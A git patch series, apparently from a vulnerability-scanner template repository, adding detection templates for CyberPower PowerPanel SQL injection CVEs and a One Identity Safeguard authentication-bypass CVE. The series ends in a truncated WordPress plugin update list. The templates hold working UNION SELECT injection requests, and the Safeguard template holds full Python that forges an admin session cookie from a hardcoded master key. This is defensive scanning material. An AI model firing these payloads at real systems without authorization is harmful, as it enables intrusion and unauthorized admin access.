MCUDBHelper + author: DhiyaneshDk + severity: high + description: | + A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3. + impact: | + An unauthenticated remote attacker can leak sensitive information via the "query_utask_verbose" function within MCUDBHelper. + reference: + - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote + - https://www.tenable.com/security/research/tra-2024-14 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-32736 + epss-score: 0.00043 + epss-percentile: 0.09691 + metadata: + verified: true + max-request: 1 + tags: cve,cve2024,cyberpower,sqli + +http: + - raw: + - | + GET /api/v1/confup?mode=&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();-- HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"code":' + - '"results":' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + regex: + - '"code":(["0-9.]+)"' From 10d2193b60f190f363be44f920f4e5353251581f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 15 Oct 2024 17:26:05 +0530 Subject: [PATCH 145/218] Create CVE-2024-32737.yaml --- http/cves/2024/CVE-2024-32737.yaml | 54 ++++++++++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 http/cves/2024/CVE-2024-32737.yaml diff --git a/http/cves/2024/CVE-2024-32737.yaml b/http/cves/2024/CVE-2024-32737.yaml new file mode 100644 index 0000000000..33ef509807 --- /dev/null +++ b/http/cves/2024/CVE-2024-32737.yaml @@ -0,0 +1,54 @@ +id: CVE-2024-32737 + +info: + name: CyberPower - SQL Injection in MCUDBHelper (Contract Result Query) + author: DhiyaneshDk + severity: high + description: | + A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.  + impact: | + An unauthenticated remote attacker can leak sensitive information via the "query_contract_result" function within MCUDBHelper. + reference: + - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote + - https://www.tenable.com/security/research/tra-2024-14 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-32737 + cwe-id: CWE-89 + epss-score: 0.00043 + epss-percentile: 0.09691 + metadata: + verified: true + max-request: 1 + tags: cve,cve2024,cyberpower,sqli + +http: + - raw: + - | + GET /api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();-- HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - ':"finished"' + - '"success":' + condition: and + + - type: word + part: content_type + words: + - 'application/json' + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + regex: + - '"modifiedtime":(["0-9.]+)"' From 3bf64fa06f9d23d1fce3d461a8d0a86865aed5db Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 15 Oct 2024 17:32:37 +0530 Subject: [PATCH 146/218] Create CVE-2024-32738.yaml --- http/cves/2024/CVE-2024-32738.yaml | 54 ++++++++++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 http/cves/2024/CVE-2024-32738.yaml diff --git a/http/cves/2024/CVE-2024-32738.yaml b/http/cves/2024/CVE-2024-32738.yaml new file mode 100644 index 0000000000..4b01ad0d10 --- /dev/null +++ b/http/cves/2024/CVE-2024-32738.yaml @@ -0,0 +1,54 @@ +id: CVE-2024-32738 + +info: + name: CyberPower - SQL Injection in MCUDBHelper (PTask Lean Query) + author: DhiyaneshDk + severity: high + description: | + A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3. + impact: | + An unauthenticated remote attacker can leak sensitive information via the "query_ptask_lean" function within MCUDBHelper. + reference: + - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote + - https://www.tenable.com/security/research/tra-2024-14 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-32738 + cwe-id: CWE-89 + epss-score: 0.00043 + epss-percentile: 0.09691 + metadata: + verified: true + max-request: 1 + tags: cve,cve2024,cyberpower,sqli + +http: + - raw: + - | + GET /api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();-- HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - ':"finished"' + - '"success":' + condition: and + + - type: word + part: content_type + words: + - 'application/json' + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + regex: + - '"modifiedtime":(["0-9.]+)"' From b1685b3c572f4a4abb258eb2b1e8e14a40be43ea Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 15 Oct 2024 17:37:49 +0530 Subject: [PATCH 147/218] Create CVE-2024-32739.yaml --- http/cves/2024/CVE-2024-32739.yaml | 53 ++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 http/cves/2024/CVE-2024-32739.yaml diff --git a/http/cves/2024/CVE-2024-32739.yaml b/http/cves/2024/CVE-2024-32739.yaml new file mode 100644 index 0000000000..a719c25817 --- /dev/null +++ b/http/cves/2024/CVE-2024-32739.yaml @@ -0,0 +1,53 @@ +id: CVE-2024-32739 + +info: + name: CyberPower - SQL Injection in MCUDBHelper (PTask Verbose Query) + author: DhiyaneshDk + severity: high + description: | + A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3. + impact: | + An unauthenticated remote attacker can leak sensitive information via the "query_ptask_verbose" function within MCUDBHelper. + reference: + - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote + - https://www.tenable.com/security/research/tra-2024-14 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-32739 + epss-score: 0.00043 + epss-percentile: 0.09691 + metadata: + verified: true + max-request: 1 + tags: cve,cve2024,cyberpower,sqli + +http: + - raw: + - | + GET /api/v1/ndconfig?mode=&uid=1'%20UNION%20select%201,2,3,sqlite_version();-- HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - ':"finished"' + - '"results":' + condition: and + + - type: word + part: content_type + words: + - 'application/json' + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + regex: + - '"code":(["0-9.]+)"' From 5b17fe55df8e0ebf667535791690d4c23a2cc4e5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 15 Oct 2024 17:44:28 +0530 Subject: [PATCH 148/218] Create CVE-2024-45488.yaml --- http/cves/2024/CVE-2024-45488.yaml | 317 +++++++++++++++++++++++++++++ 1 file changed, 317 insertions(+) create mode 100644 http/cves/2024/CVE-2024-45488.yaml diff --git a/http/cves/2024/CVE-2024-45488.yaml b/http/cves/2024/CVE-2024-45488.yaml new file mode 100644 index 0000000000..a67b02bc59 --- /dev/null +++ b/http/cves/2024/CVE-2024-45488.yaml @@ -0,0 +1,317 @@ +id: CVE-2024-45488 + +info: + name: SafeGuard for Privileged Passwords < 7.5.2 - Authentication Bypass + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + One Identity Safeguard for Privileged Passwords before 7.5.2 allows unauthorized access because of an issue related to cookies. This only affects virtual appliance installations (VMware or HyperV). The fixed versions are 7.0.5.1 LTS, 7.4.2, and 7.5.2. + reference: + - https://blog.amberwolf.com/blog/2024/september/cve-2024-45488-one-identity-safeguard-for-privileged-passwords-authentication-bypass/ + - https://blog.amberwolf.com/blog/2024/september/skeleton-cookie-breaking-into-safeguard-with-cve-2024-45488/ + - https://gist.github.com/rxwx/c968b3324e74058208fe6e168fd8730f + - https://support.oneidentity.com/kb/4376740/safeguard-for-privileged-passwords-security-vulnerability-notification-defect-460620 + - https://support.oneidentity.com/product-notification/noti-00001628 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-45488 + epss-score: 0.00043 + epss-percentile: 0.09691 + metadata: + verified: true + max-request: 1 + shodan-query: html:"Safeguard for Privileged Passwords" + tags: cve,cve2024,auth-bypass,safeguard +code: + - engine: + - py + - python3 # requires python to be pre-installed on system running nuclei + source: | + # pip install pycryptodome + from datetime import datetime, timedelta + from Crypto.Cipher import AES, DES3 + from Crypto.Hash import HMAC, SHA1, SHA512, SHA256 + from Crypto.Util.Padding import pad + from io import BytesIO + import argparse + import string + import base64 + import uuid + import os + + class DPAPIBlob: + CALG_3DES = 0x6603 + CALG_AES_256 = 0x6610 + + CALG_SHA1 = 0x8004 + CALG_SHA_256 = 0x800c + CALG_SHA_512 = 0x800e + + def combine_bytes(self, *arrays): + return b''.join(arrays) + + def hmac_sha512(self, key, data): + hmac = HMAC.new(key, digestmod=SHA512) + hmac.update(data) + return hmac.digest() + + def derive_key_raw(self, hash_bytes, alg_hash): + ipad = bytearray([0x36] * 64) + opad = bytearray([0x5C] * 64) + + for i in range(len(hash_bytes)): + ipad[i] ^= hash_bytes[i] + opad[i] ^= hash_bytes[i] + + if alg_hash == self.CALG_SHA1: + sha1 = SHA1.new() + ipad_sha1bytes = sha1.new(ipad).digest() + opad_sha1bytes = sha1.new(opad).digest() + return self.combine_bytes(ipad_sha1bytes, opad_sha1bytes) + else: + raise Exception(f"Unsupported alg_hash: {alg_hash}") + + def derive_key2(self, key, nonce, hash_algorithm, blob, entropy=None): + """ + Derive a key using the provided key, nonce, hash algorithm, blob, and optional entropy. + + :param key: The base key material. + :param nonce: The nonce (salt) value. + :param hash_algorithm: The hash algorithm identifier (SHA1, SHA256, SHA512). + :param blob: The additional data to include in the key derivation. + :param entropy: Optional entropy to include in the key derivation. + :return: The derived key as a byte array. + """ + if hash_algorithm == self.CALG_SHA1: + hmac = HMAC.new(key, digestmod=SHA1) + elif hash_algorithm == self.CALG_SHA_256: + hmac = HMAC.new(key, digestmod=SHA256) + elif hash_algorithm == self.CALG_SHA_512: + hmac = HMAC.new(key, digestmod=SHA512) + else: + raise Exception(f"Unsupported hash algorithm: {hash_algorithm}") + + key_material = bytearray() + key_material.extend(nonce) + + if entropy is not None: + key_material.extend(entropy) + + key_material.extend(blob) + + hmac.update(key_material) + return hmac.digest() + + def derive_key(self, key_bytes, salt_bytes, alg_hash, entropy=None): + if alg_hash == self.CALG_SHA_512: + if entropy is not None: + return self.hmac_sha512(key_bytes, self.combine_bytes(salt_bytes, entropy)) + else: + return self.hmac_sha512(key_bytes, salt_bytes) + elif alg_hash == self.CALG_SHA1: + ipad = bytearray([0x36] * 64) + opad = bytearray([0x5C] * 64) + + for i in range(len(key_bytes)): + ipad[i] ^= key_bytes[i] + opad[i] ^= key_bytes[i] + + buffer_i = self.combine_bytes(ipad, salt_bytes) + + sha1 = SHA1.new() + sha1.update(buffer_i) + sha1_buffer_i = sha1.digest() + + buffer_o = self.combine_bytes(opad, sha1_buffer_i) + if entropy is not None: + buffer_o = self.combine_bytes(buffer_o, entropy) + + sha1.update(buffer_o) + sha1_buffer_o = sha1.digest() + + return self.derive_key_raw(sha1_buffer_o, alg_hash) + else: + raise Exception("Unsupported Hash Algorithm") + + def encrypt(self, plaintext, key, algCrypt): + if algCrypt == self.CALG_3DES: + iv = b'\x00' * 8 + cipher = DES3.new(key, DES3.MODE_CBC, iv) + elif algCrypt == self.CALG_AES_256: + iv = b'\x00' * 16 + cipher = AES.new(key, AES.MODE_CBC, iv) + else: + raise Exception(f"Unsupported encryption algorithm: {algCrypt}") + + padded_data = pad(plaintext, cipher.block_size) + return cipher.encrypt(padded_data) + + def create_blob(self, plaintext, masterKey, algCrypt, algHash, masterKeyGuid, flags=0, entropy=None, description=""): + descBytes = description.encode('utf-16le') if description else b'\x00\x00' + saltBytes = os.urandom(32) + hmac2KeyLen = 32 + + if algCrypt == self.CALG_3DES: + algCryptLen = 192 + elif algCrypt == self.CALG_AES_256: + algCryptLen = 256 + else: + raise Exception(f"Unsupported encryption algorithm: {algCrypt}") + + if algHash == self.CALG_SHA1: + signLen = 20 + elif algHash == self.CALG_SHA_256: + signLen = 32 + elif algHash == self.CALG_SHA_512: + signLen = 64 + else: + raise Exception(f"Unsupported hash algorithm: {algHash}") + + # Derive key + derivedKeyBytes = self.derive_key(masterKey, saltBytes, algHash, entropy) + finalKeyBytes = derivedKeyBytes[:algCryptLen // 8] + + # Encrypt data + encData = self.encrypt(plaintext, finalKeyBytes, algCrypt) + + # Construct the BLOB using BytesIO + blob = BytesIO() + + # Version + blob.write((1).to_bytes(4, 'little')) + + # Provider GUID + providerGuid = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb").bytes_le + blob.write(providerGuid) + + # MasterKey version + blob.write((1).to_bytes(4, 'little')) + + # MasterKey GUID + blob.write(masterKeyGuid.bytes_le) + + # Flags + blob.write((flags).to_bytes(4, 'little')) + + # Description length + blob.write(len(descBytes).to_bytes(4, 'little')) + + # Description + blob.write(descBytes) + + # Algorithm ID + blob.write(algCrypt.to_bytes(4, 'little')) + + # Algorithm key length + blob.write(algCryptLen.to_bytes(4, 'little')) + + # Salt length + blob.write(len(saltBytes).to_bytes(4, 'little')) + + # Salt + blob.write(saltBytes) + + # HMAC key length (always 0) + blob.write((0).to_bytes(4, 'little')) + + # Hash algorithm ID + blob.write(algHash.to_bytes(4, 'little')) + + # Hash length + blob.write((len(derivedKeyBytes) * 8).to_bytes(4, 'little')) + + # HMAC2 key length + blob.write(hmac2KeyLen.to_bytes(4, 'little')) + + # HMAC2 key + hmac2Key = os.urandom(hmac2KeyLen) + blob.write(hmac2Key) + + # Data length + blob.write(len(encData).to_bytes(4, 'little')) + + # Encrypted Data + blob.write(encData) + + # Create the HMAC (sign) over the entire blob except for the sign field + signBlob = blob.getvalue()[20:] # Skip the first 20 bytes for the HMAC calculation + sign = self.derive_key2(masterKey, hmac2Key, algHash, signBlob, entropy) + + # Sign length + blob.write(signLen.to_bytes(4, 'little')) + + # Sign + blob.write(sign) + + return blob.getvalue() + + def main(): + args = { + 'master_key': '48F4153A8C26C2B026562685B67C30EFF119D735', + 'master_key_guid': '98dc3c79-9aa5-4efc-927f-ccec24eaa14e', + 'local': 1, + 'base64': 1 + } + current_time = datetime.utcnow().strftime("%Y%m%dT%H%M%SZ") + future_time = (datetime.utcnow() + timedelta(days=1)).strftime("%Y%m%dT%H%M%SZ") + + plaintext= f"local,admin,Primary,Password,{current_time},{future_time}" + plaintext=plaintext.encode('utf-8') + if not all(c in string.hexdigits for c in args['master_key']): + print (f' Provided master key is not valid: {args.master_key}') + return + + try: + uuid.UUID(args["master_key_guid"]) + except ValueError: + print (f' Provided master key GUID is not valid: {args["master_key_guid"]}') + return + + # Parse the master key and GUID + masterKey = bytes.fromhex(args['master_key']) + masterKeyGuid = uuid.UUID(args["master_key_guid"]) + algCrypt = DPAPIBlob.CALG_AES_256 + algHash = DPAPIBlob.CALG_SHA_512 + flags = 0 + + if args['local']: + flags |= 4 # CRYPTPROTECT_LOCAL_MACHINE + + dpapi = DPAPIBlob() + encrypted_blob = dpapi.create_blob(plaintext, masterKey, algCrypt, algHash, masterKeyGuid, flags) + + if args['base64']: + output_data = base64.b64encode(encrypted_blob).decode('utf-8') + else: + output_data = encrypted_blob.hex(' ') + + print(f"{output_data}") + + if __name__ == "__main__": + main() + +http: + - method: GET + path: + - "{{BaseURL}}/RSTS/UserLogin/LoginController?response_type=token&redirect_uri=https%3A%2F%2Flocalhost&loginRequestStep=6&csrfTokenTextbox=aaa" + headers: + Cookie: "CsrfToken=aaa; stsIdentity0={{code_response}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "access_token=" + - "RelyingPartyUrl" + condition: and + + - type: word + part: content_type + words: + - 'application/json' + + - type: status + status: + - 200 From 712ac8b4ff36e0fa61770d529bd2f4af3c610ed5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 15 Oct 2024 17:52:28 +0530 Subject: [PATCH 149/218] fix-lint-error --- http/cves/2024/CVE-2024-45488.yaml | 56 +++++++++++++++--------------- 1 file changed, 28 insertions(+), 28 deletions(-) diff --git a/http/cves/2024/CVE-2024-45488.yaml b/http/cves/2024/CVE-2024-45488.yaml index a67b02bc59..4ee6eccef1 100644 --- a/http/cves/2024/CVE-2024-45488.yaml +++ b/http/cves/2024/CVE-2024-45488.yaml @@ -71,7 +71,7 @@ code: return self.combine_bytes(ipad_sha1bytes, opad_sha1bytes) else: raise Exception(f"Unsupported alg_hash: {alg_hash}") - + def derive_key2(self, key, nonce, hash_algorithm, blob, entropy=None): """ Derive a key using the provided key, nonce, hash algorithm, blob, and optional entropy. @@ -151,7 +151,7 @@ code: descBytes = description.encode('utf-16le') if description else b'\x00\x00' saltBytes = os.urandom(32) hmac2KeyLen = 32 - + if algCrypt == self.CALG_3DES: algCryptLen = 192 elif algCrypt == self.CALG_AES_256: @@ -167,83 +167,83 @@ code: signLen = 64 else: raise Exception(f"Unsupported hash algorithm: {algHash}") - + # Derive key derivedKeyBytes = self.derive_key(masterKey, saltBytes, algHash, entropy) finalKeyBytes = derivedKeyBytes[:algCryptLen // 8] - + # Encrypt data encData = self.encrypt(plaintext, finalKeyBytes, algCrypt) - + # Construct the BLOB using BytesIO blob = BytesIO() - + # Version blob.write((1).to_bytes(4, 'little')) - + # Provider GUID providerGuid = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb").bytes_le blob.write(providerGuid) - + # MasterKey version blob.write((1).to_bytes(4, 'little')) - + # MasterKey GUID blob.write(masterKeyGuid.bytes_le) - + # Flags blob.write((flags).to_bytes(4, 'little')) - + # Description length blob.write(len(descBytes).to_bytes(4, 'little')) - + # Description blob.write(descBytes) - + # Algorithm ID blob.write(algCrypt.to_bytes(4, 'little')) - + # Algorithm key length blob.write(algCryptLen.to_bytes(4, 'little')) - + # Salt length blob.write(len(saltBytes).to_bytes(4, 'little')) - + # Salt blob.write(saltBytes) - + # HMAC key length (always 0) blob.write((0).to_bytes(4, 'little')) - + # Hash algorithm ID blob.write(algHash.to_bytes(4, 'little')) - + # Hash length blob.write((len(derivedKeyBytes) * 8).to_bytes(4, 'little')) - + # HMAC2 key length blob.write(hmac2KeyLen.to_bytes(4, 'little')) - + # HMAC2 key hmac2Key = os.urandom(hmac2KeyLen) blob.write(hmac2Key) - + # Data length blob.write(len(encData).to_bytes(4, 'little')) - + # Encrypted Data blob.write(encData) - + # Create the HMAC (sign) over the entire blob except for the sign field signBlob = blob.getvalue()[20:] # Skip the first 20 bytes for the HMAC calculation sign = self.derive_key2(masterKey, hmac2Key, algHash, signBlob, entropy) - + # Sign length blob.write(signLen.to_bytes(4, 'little')) - + # Sign blob.write(sign) - + return blob.getvalue() def main(): @@ -280,7 +280,7 @@ code: dpapi = DPAPIBlob() encrypted_blob = dpapi.create_blob(plaintext, masterKey, algCrypt, algHash, masterKeyGuid, flags) - + if args['base64']: output_data = base64.b64encode(encrypted_blob).decode('utf-8') else: From fdc007b82a34102a0aca92c2687648f4101e1f5e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 15 Oct 2024 17:57:58 +0530 Subject: [PATCH 150/218] fix-fp --- http/cves/2024/CVE-2024-32736.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/http/cves/2024/CVE-2024-32736.yaml b/http/cves/2024/CVE-2024-32736.yaml index a1cb9ffac7..ad601ee2aa 100644 --- a/http/cves/2024/CVE-2024-32736.yaml +++ b/http/cves/2024/CVE-2024-32736.yaml @@ -37,6 +37,11 @@ http: - '"results":' condition: and + - type: word + part: content_type + words: + - 'application/json' + - type: status status: - 200 From d278d02fa0a50daa6091a3657a0ef0fb1ac4025f Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Wed, 16 Oct 2024 00:22:52 +0000 Subject: [PATCH 151/218] =?UTF-8?q?chore:=20update=20WordPress=20Plugins?= =?UTF-8?q?=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- helpers/wordpress/plugins/advanced-custom-fields.txt | 2 +- helpers/wordpress/plugins/astra-sites.txt | 2 +- helpers/wordpress/plugins/backwpup.txt | 2 +- helpers/wordpress/plugins/cookie-law-info.txt | 2 +- helpers/wordpress/plugins/elementor.txt | 2 +- helpers/wordpress/plugins/forminator.txt | 2 +- helpers/wordpress/plugins/jetpack-boost.txt | 2 +- helpers/wordpress/plugins/mailpoet.txt | 2 +- helpers/wordpress/plugins/malcare-security.txt | 2 +- helpers/wordpress/plugins/nextend-facebook-connect.txt | 2 +- helpers/wordpress/plugins/optinmonster.txt | 2 +- helpers/wordpress/plugins/premium-addons-for-elementor.txt | 2 +- helpers/wordpress/plugins/smart-slider-3.txt | 2 +- helpers/wordpress/plugins/tablepress.txt | 2 +- helpers/wordpress/plugins/woocommerce-paypal-payments.txt | 2 +- helpers/wordpress/plugins/wp-google-maps.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - http/technologies/wordpress/plugins/extendify.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - 